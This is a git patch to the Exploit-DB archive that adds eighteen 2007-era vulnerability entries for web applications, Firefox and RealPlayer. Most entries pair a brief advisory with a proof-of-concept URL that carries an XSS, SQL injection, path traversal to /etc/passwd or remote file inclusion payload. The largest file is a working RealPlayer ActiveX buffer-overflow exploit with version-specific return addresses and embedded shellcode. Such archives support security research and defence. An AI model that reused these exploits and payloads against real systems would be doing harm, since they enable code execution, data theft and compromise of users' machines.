From f14cd157526e87cd72465e6192e087b4abff22eb Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 6 Jan 2014 04:12:15 +0000
Subject: [PATCH] Updated 01_06_2014

---
 files.csv                         |  18 ++++
 platforms/asp/webapps/30696.txt   |   7 ++
 platforms/asp/webapps/30706.txt   |   7 ++
 platforms/asp/webapps/30708.txt   |   9 ++
 platforms/jsp/webapps/30704.txt   |   7 ++
 platforms/jsp/webapps/30705.txt   |   5 +
 platforms/multiple/dos/30702.html |  72 +++++++++++++
 platforms/php/webapps/30691.txt   |   8 ++
 platforms/php/webapps/30693.txt   |   9 ++
 platforms/php/webapps/30694.txt   |   7 ++
 platforms/php/webapps/30695.txt   |  10 ++
 platforms/php/webapps/30697.txt   |   7 ++
 platforms/php/webapps/30698.txt   |  35 +++++++
 platforms/php/webapps/30699.txt   |   9 ++
 platforms/php/webapps/30700.txt   |   9 ++
 platforms/php/webapps/30701.txt   |  10 ++
 platforms/php/webapps/30703.txt   |   9 ++
 platforms/php/webapps/30707.txt   |   9 ++
 platforms/windows/remote/30692.js | 167 ++++++++++++++++++++++++++++++
 19 files changed, 414 insertions(+)
 create mode 100755 platforms/asp/webapps/30696.txt
 create mode 100755 platforms/asp/webapps/30706.txt
 create mode 100755 platforms/asp/webapps/30708.txt
 create mode 100755 platforms/jsp/webapps/30704.txt
 create mode 100755 platforms/jsp/webapps/30705.txt
 create mode 100755 platforms/multiple/dos/30702.html
 create mode 100755 platforms/php/webapps/30691.txt
 create mode 100755 platforms/php/webapps/30693.txt
 create mode 100755 platforms/php/webapps/30694.txt
 create mode 100755 platforms/php/webapps/30695.txt
 create mode 100755 platforms/php/webapps/30697.txt
 create mode 100755 platforms/php/webapps/30698.txt
 create mode 100755 platforms/php/webapps/30699.txt
 create mode 100755 platforms/php/webapps/30700.txt
 create mode 100755 platforms/php/webapps/30701.txt
 create mode 100755 platforms/php/webapps/30703.txt
 create mode 100755 platforms/php/webapps/30707.txt
 create mode 100755 platforms/windows/remote/30692.js

diff --git a/files.csv b/files.csv
index 37a79bb1b..f816b2123 100755
--- a/files.csv
+++ b/files.csv
@@ -27530,3 +27530,21 @@ id,file,description,date,author,platform,type,port
 30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
 30685,platforms/php/webapps/30685.txt,"SiteBar <= 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
 30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
+30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 Multiple Cross Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0
+30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0
+30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0
+30694,platforms/php/webapps/30694.txt,"SocketMail 2.2.1 Lostpwd.PHP Cross-Site Scripting Vulnerability",2007-10-19,"Ivan Sanchez",php,webapps,0
+30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 rnote.PHP Multiple Cross Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0
+30696,platforms/asp/webapps/30696.txt,"SearchSimon Lite 1.0 Filename.ASP Cross-Site Scripting Vulnerability",2007-10-20,"Aria-Security Team",asp,webapps,0
+30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 Index.PHP Local File Include Vulnerability",2007-10-20,sekuru,php,webapps,0
+30698,platforms/php/webapps/30698.txt,"Flatnuke3 File Manager Module Unauthorized Access Vulnerability",2007-10-22,KiNgOfThEwOrLd,php,webapps,0
+30699,platforms/php/webapps/30699.txt,"Hackish 1.1 Blocco.PHP Cross-Site Scripting Vulnerability",2007-10-22,Matrix86,php,webapps,0
+30700,platforms/php/webapps/30700.txt,"DMCMS 0.7 Index.PHP SQL Injection Vulnerability",2007-10-22,"Aria-Security Team",php,webapps,0
+30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 Download.PHP Local File Include Vulnerability",2007-10-22,hack2prison,php,webapps,0
+30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 Malformed XBL Constructor Remote Denial of Service Vulnerability",2007-10-22,"Soroush Dalili",multiple,dos,0
+30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting Arbitrary File Upload Vulnerability",2007-10-23,"Pete Houston",php,webapps,0
+30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0
+30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0
+30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability",2007-10-24,"Aria-Security Team",asp,webapps,0
+30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 Includes.PHP Remote File Include Vulnerability",2007-10-24,Alucar,php,webapps,0
+30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 Page.ASP SQL Injection Vulnerability",2007-10-25,joseph.giron13,asp,webapps,0
diff --git a/platforms/asp/webapps/30696.txt b/platforms/asp/webapps/30696.txt
new file mode 100755
index 000000000..4dc48c2d7
--- /dev/null
+++ b/platforms/asp/webapps/30696.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26142/info
+
+SearchSimon Lite is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example/filename.asp?QUERY=[XSS]&Submit=Search%21&ACTION=SEARCH 
\ No newline at end of file
diff --git a/platforms/asp/webapps/30706.txt b/platforms/asp/webapps/30706.txt
new file mode 100755
index 000000000..78fb3705e
--- /dev/null
+++ b/platforms/asp/webapps/30706.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26193/info
+
+CodeWidgets Web Based Alpha Tabbed Address Book is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.asp?alpha=[SQL INJECTION] 
\ No newline at end of file
diff --git a/platforms/asp/webapps/30708.txt b/platforms/asp/webapps/30708.txt
new file mode 100755
index 000000000..ebf602173
--- /dev/null
+++ b/platforms/asp/webapps/30708.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26207/info
+
+Aleris Web Publishing Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Aleris Web Publishing Server 3.0 is vulnerable; other versions may also be affected. 
+
+www.example.com/calendar/page.asp?mode=1%20union%20all%20select%201,2,3,4,5,6%20FROM%20users-- 
\ No newline at end of file
diff --git a/platforms/jsp/webapps/30704.txt b/platforms/jsp/webapps/30704.txt
new file mode 100755
index 000000000..7c81a8bad
--- /dev/null
+++ b/platforms/jsp/webapps/30704.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26182/info
+
+GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process. 
+
+http://www.example.com/ghboard/component/flashupload/download.jsp?name=[file_name]
+
+http://www.example.com/ghboard/component/flashupload/download.jsp?name=../config.js
diff --git a/platforms/jsp/webapps/30705.txt b/platforms/jsp/webapps/30705.txt
new file mode 100755
index 000000000..122468821
--- /dev/null
+++ b/platforms/jsp/webapps/30705.txt
@@ -0,0 +1,5 @@
+source: http://www.securityfocus.com/bid/26182/info
+ 
+GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process.
+ 
+http://www.example.com/ghboard/component/flashupload/data/upload_filename.xxx 
\ No newline at end of file
diff --git a/platforms/multiple/dos/30702.html b/platforms/multiple/dos/30702.html
new file mode 100755
index 000000000..07f904d24
--- /dev/null
+++ b/platforms/multiple/dos/30702.html
@@ -0,0 +1,72 @@
+source: http://www.securityfocus.com/bid/26172/info
+
+Mozilla Firefox is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input.
+
+Attackers can exploit this issue to cause denial-of-service conditions.
+
+Firefox 2.0.0.7 is vulnerable; other versions may also be affected. 
+
+i######################### WwW.BugReport.ir #########################
+#
+#      AmnPardaz Security Research & Penetration Testing Group
+#
+# Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service
+# Vendor URL: www.mozilla.org
+# Version: <= 2.0.0.7
+# Fix Available: Yes!
+# Soloution: Update to 2.0.0.8
+# Note: This bug works on 2.0.0.8 in different way. Although this bug doesn't crash 2.0.0.8, it causes not showing html code by viewing source in Mozilla Firefox 2.0.0.8 and this is another bug on 2.0.0.8!
+# Proof: http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm
+#
+######################### WwW.AmnPardaz.com ########################
+#
+# Leaders : Shahin Ramezany & Sorush Dalili
+# Team Members: Amir Hossein Khonakdar, Hamid Farhadi
+# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
+# Country: Iran
+# Greetz To : Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net
+# Contacts: <th3_vampire {4-t] yahoo [d-0-t} com> & <Irsdl {4-t] yahoo [d-0-t} com>
+# 
+######################## Bug Description ###########################
+#
+# To do this work we need 2 files (Html,XML).
+# Their codes was written below.
+#
+# Save below codes in a HTML file.
+#
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+<html>
+	<head>
+		<style>BODY{-moz-binding:url("moz.xml#xss")}</style>
+	</head>
+	<body>
+		Suddenly see you baby! If you see this bug execution was failed!
+		<script>
+			alert('Soroush Dalili & Shahin Ramezani From Astalavista.ir')
+		</script>
+	</body>
+</html>
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+#
+# Save below codes in "moz.xml" file.
+#
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+<?xml version="1.0"?>
+<bindings xmlns="http://www.mozilla.org/xbl">
+  <binding id="xss">
+    <implementation>
+      <constructor><![CDATA[
+		eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29'));		
+  	  ]]></constructor>
+    </implementation>
+  </binding>
+</bindings>
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+#
+# Now by runnig the HTML file by Mozilla FireFox <= 2.0.0.7 it will be crashed and by Mozilla FireFox 2.0.0.8 no code will be showed by viewing the source.
+#
+###################################################################
\ No newline at end of file
diff --git a/platforms/php/webapps/30691.txt b/platforms/php/webapps/30691.txt
new file mode 100755
index 000000000..dc5f945be
--- /dev/null
+++ b/platforms/php/webapps/30691.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/26128/info
+
+OmniVista 4760 is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.somesite.com/?Langue="><script>alert("xss")</script><" 
+http://www.somesite.com/php-bin/Webclient.php?action=<script>alert("xss")</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/30693.txt b/platforms/php/webapps/30693.txt
new file mode 100755
index 000000000..1daba8a4f
--- /dev/null
+++ b/platforms/php/webapps/30693.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26136/info
+
+SocketKB is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect SocketKB 1.1.5; other versions may also be affected. 
+
+http://www.example.com/[PATH]/?__f=article&art_id=###[XSS]&node=###[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/30694.txt b/platforms/php/webapps/30694.txt
new file mode 100755
index 000000000..5b913bfe0
--- /dev/null
+++ b/platforms/php/webapps/30694.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26138/info
+
+SocketMail is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/path/lostpwd.php?lost_id=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/30695.txt b/platforms/php/webapps/30695.txt
new file mode 100755
index 000000000..86511b1c1
--- /dev/null
+++ b/platforms/php/webapps/30695.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26140/info
+
+rNote is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
+
+rNote 0.9.7.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/rnote/rnote.php?d=<script>alert("RxH")</script 
+http://www.example.com/rnote/rnote.php?u=<script>alert("RxH")</script 
\ No newline at end of file
diff --git a/platforms/php/webapps/30697.txt b/platforms/php/webapps/30697.txt
new file mode 100755
index 000000000..e3f278fde
--- /dev/null
+++ b/platforms/php/webapps/30697.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26143/info
+
+ReloadCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized user to execute local scripts or to view arbitrary files that may contain sensitive information that can aid in further attacks. 
+
+http://www.example.com/index.php?module=../../../../etc/passwd 
\ No newline at end of file
diff --git a/platforms/php/webapps/30698.txt b/platforms/php/webapps/30698.txt
new file mode 100755
index 000000000..35de4ebe8
--- /dev/null
+++ b/platforms/php/webapps/30698.txt
@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/26155/info
+
+Flatnuke3 is prone to an unauthorized-access vulnerability because it fails to adequately verify administrative credentials while logging in via the 'File Manager' module.
+
+An attacker can exploit this vulnerability to gain administrative control of the application; other attacks are also possible.
+
+This issue affects Flatnuke3-2007-10-10; other versions may also be vulnerable. 
+
+Full Path Disclosure Example:
+
+http://www.example.com/flatnuke3_path/index.php?mod=[forum_path]
+&op=disc&argumentname=[a_casual_char]
+---------------------------------------------------------------
+File Replace Exploit:
+
+<form method="post" action="http://www.example.com/flatnuke3_path/index.php?
+mod=none_filemanager&amp;op="><textarea id="body" name="body" cols="90" rows="
+35">
+&lt;/textarea&gt;<br><input value="Save" type="submit"><input type="reset">
+<input name="opmod" value="save" type="hidden">
+<input name="ffile" value="[file_name].php" type="hidden">
+<input name="dir" value="/[script_path]/[file_path]" type="hidden"><input
+class="button" onclick="history.back()" value="Annulla" type="button"></form>
+---------------------------------------------------------------
+User Credential View/Edit Exploit:
+
+http://www.example.com/flatnuke3_path/index.php?mod=none_filemanager&dir=/
+[script_path]/[flatnuke3_path]/misc/fndatabase/users/&ffile=[username].
+php&opmod=open&op=
+
+Or, for example u can view and edit a file located on the server:
+
+http://www.example.com/flatnuke3_path/index.php?mod=none_filemanager&dir=/
+[script_path]/&ffile=[file]&opmod=open&op=
+
diff --git a/platforms/php/webapps/30699.txt b/platforms/php/webapps/30699.txt
new file mode 100755
index 000000000..d020cabba
--- /dev/null
+++ b/platforms/php/webapps/30699.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26167/info
+
+Hackish is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Hackish BETA 1.1 is vulnerable to this issue; other versions may also be affected.
+
+http://www.example.com/hackish/shoutbox/blocco.php?go_shout=Matrix86%3C/a%3E%3C/p%3E%3C/div%3E%3Chtml%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C/html%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/30700.txt b/platforms/php/webapps/30700.txt
new file mode 100755
index 000000000..8ada47737
--- /dev/null
+++ b/platforms/php/webapps/30700.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26169/info
+
+DMCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects DMCMS 0.7.0; other versions may also be affected. 
+
+http://www.example.com/index.php?page=media&id=[SQL INJECTION CODE GOES HERE] 
\ No newline at end of file
diff --git a/platforms/php/webapps/30701.txt b/platforms/php/webapps/30701.txt
new file mode 100755
index 000000000..9eba0f1c4
--- /dev/null
+++ b/platforms/php/webapps/30701.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26171/info
+
+Jeebles Directory is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized user to execute local scripts or to view arbitrary files that may contain sensitive information that can aid in further attacks.
+
+This issue affects Jeebles Directory 2.9.60; other versions may also be affected. 
+
+
+http://www.example.com/[path]/download.php?settings2.inc.php 
\ No newline at end of file
diff --git a/platforms/php/webapps/30703.txt b/platforms/php/webapps/30703.txt
new file mode 100755
index 000000000..78242f18e
--- /dev/null
+++ b/platforms/php/webapps/30703.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26179/info
+
+Japanese PHP Gallery Hosting is prone to an arbitrary-file-upload vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Versions of Japanese PHP Gallery Hosting released prior to 10/2007 are vulnerable.
+
+http://www.example.com/upload/upload.php?ServerPath=http://www.example2.com/malicious.php.arbitraryextension 
\ No newline at end of file
diff --git a/platforms/php/webapps/30707.txt b/platforms/php/webapps/30707.txt
new file mode 100755
index 000000000..b6e0ed152
--- /dev/null
+++ b/platforms/php/webapps/30707.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26194/info
+
+basicFramework is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+This issue affects basicFramework 1.0; other versions may also be vulnerable. 
+
+http://www.example.com/includes.php?root=[shell] 
\ No newline at end of file
diff --git a/platforms/windows/remote/30692.js b/platforms/windows/remote/30692.js
new file mode 100755
index 000000000..c35339658
--- /dev/null
+++ b/platforms/windows/remote/30692.js
@@ -0,0 +1,167 @@
+source: http://www.securityfocus.com/bid/26130/info
+
+RealPlayer is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks of user-supplied input before copying it to an insufficiently sized memory buffer.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the application using the affected control (typically Internet Explorer). Successful attacks can compromise the application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions. 
+
+<script language="javascript">
+
+eval("function RealExploit()
+
+{
+
+var user = navigator.userAgent.toLowerCase();
+
+if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
+
+  return;
+
+if(user.indexOf("nt 5.")==-1)
+
+  return;
+
+VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
+
+try
+
+{
+
+  Real = new ActiveXObject(VulObject);
+
+}catch(error)
+
+{
+
+  return;
+
+}
+
+RealVersion = Real.PlayerProperty("PRODUCTVERSION");
+
+Padding = "";
+
+JmpOver = unescape("%75%06%74%04");
+
+for(i=0;i<32*148;i++)
+
+  Padding += "S";
+
+ 
+
+ 
+
+if(RealVersion.indexOf("6.0.14.") == -1)
+
+{
+
+  if(navigator.userLanguage.toLowerCase() == "zh-cn")
+
+   ret = unescape("%7f%a5%60");
+
+  else if(navigator.userLanguage.toLowerCase() == "en-us")
+
+   ret = unescape("%4f%71%a4%60");
+
+  else
+
+   return;
+
+}
+
+else if(RealVersion == "6.0.14.544")
+
+  ret = unescape("%63%11%08%60");
+
+else if(RealVersion == "6.0.14.550")
+
+  ret = unescape("%63%11%04%60");
+
+else if(RealVersion == "6.0.14.552")
+
+  ret = unescape("%79%31%01%60");
+
+else if(RealVersion == "6.0.14.543")
+
+  ret = unescape("%79%31%09%60");
+
+else if(RealVersion == "6.0.14.536")
+
+  ret = unescape("%51%11%70%63");
+
+else
+
+  return;
+
+ 
+
+ 
+
+ 
+
+if(RealVersion.indexOf("6.0.10.") != -1)
+
+{
+
+  for(i=0;i<4;i++)
+
+   Padding = Padding + JmpOver;
+
+  Padding = Padding + ret;
+
+}
+
+else if(RealVersion.indexOf("6.0.11.") != -1)
+
+{
+
+  for(i=0;i<6;i++)
+
+   Padding = Padding + JmpOver;
+
+  Padding = Padding + ret;
+
+}
+
+else if(RealVersion.indexOf("6.0.12.") != -1)
+
+{
+
+  for(i=0;i<9;i++)
+
+   Padding = Padding + JmpOver;
+
+  Padding = Padding + ret;
+
+}
+
+else if(RealVersion.indexOf("6.0.14.") != -1)
+
+{
+
+  for(i=0;i<10;i++)
+
+   Padding = Padding + JmpOver;
+
+   Padding = Padding + ret;
+
+}
+
+ 
+
+AdjESP = "LLLL\\XXXXXLD";
+
+Shell = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIJKBtnkSEgLnkD4vUT8fczUpVLKQfa04CHuFSJiCyqQnMFSIKtvvomnVtFHfXYbbTTHYQzkTMgsxZ3pjKHoUkyO1eJGqNlKsnQ4S3YMRFnkDL2knkQNELeSIMNkGtlKFckukspuSB2LrMrOpnTnE4RLRLS01S7JclRuVNSUt8PegpEcIPU4vcQPP0ahTLnkaP4LNkppwlNMLKSps8JKS9lKCpUdLMcpcLNkaPWLJ5OOLNbn4NjLzHNdKOyokOmS8ls4K3dltd7LIoN0lUv0MoTv4ZdoBPhhROkOKOYoLKSdWTkLLMSbNZVSYKrsbs3bzKfD0SKOjp1MOONxKNozTNm8scioKOkONcJLUTK3VLQ4qrKOxPMosNkhm2qcHhspKOkO9obrkOXPkXKg9oKO9osXsDT4pp4zvODoE4ea6NPlrLQcu71yrNcWTne3poPmTo2DDqFOprrLDnpecHQuWp";
+
+PayLoad = Padding + AdjESP + Shell;
+
+while(PayLoad.length < 0x8000)
+
+  PayLoad += "YuanGe"; // ?~??~-.=!
+
+Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
+
+}
+
+RealExploit();")
+
+</script>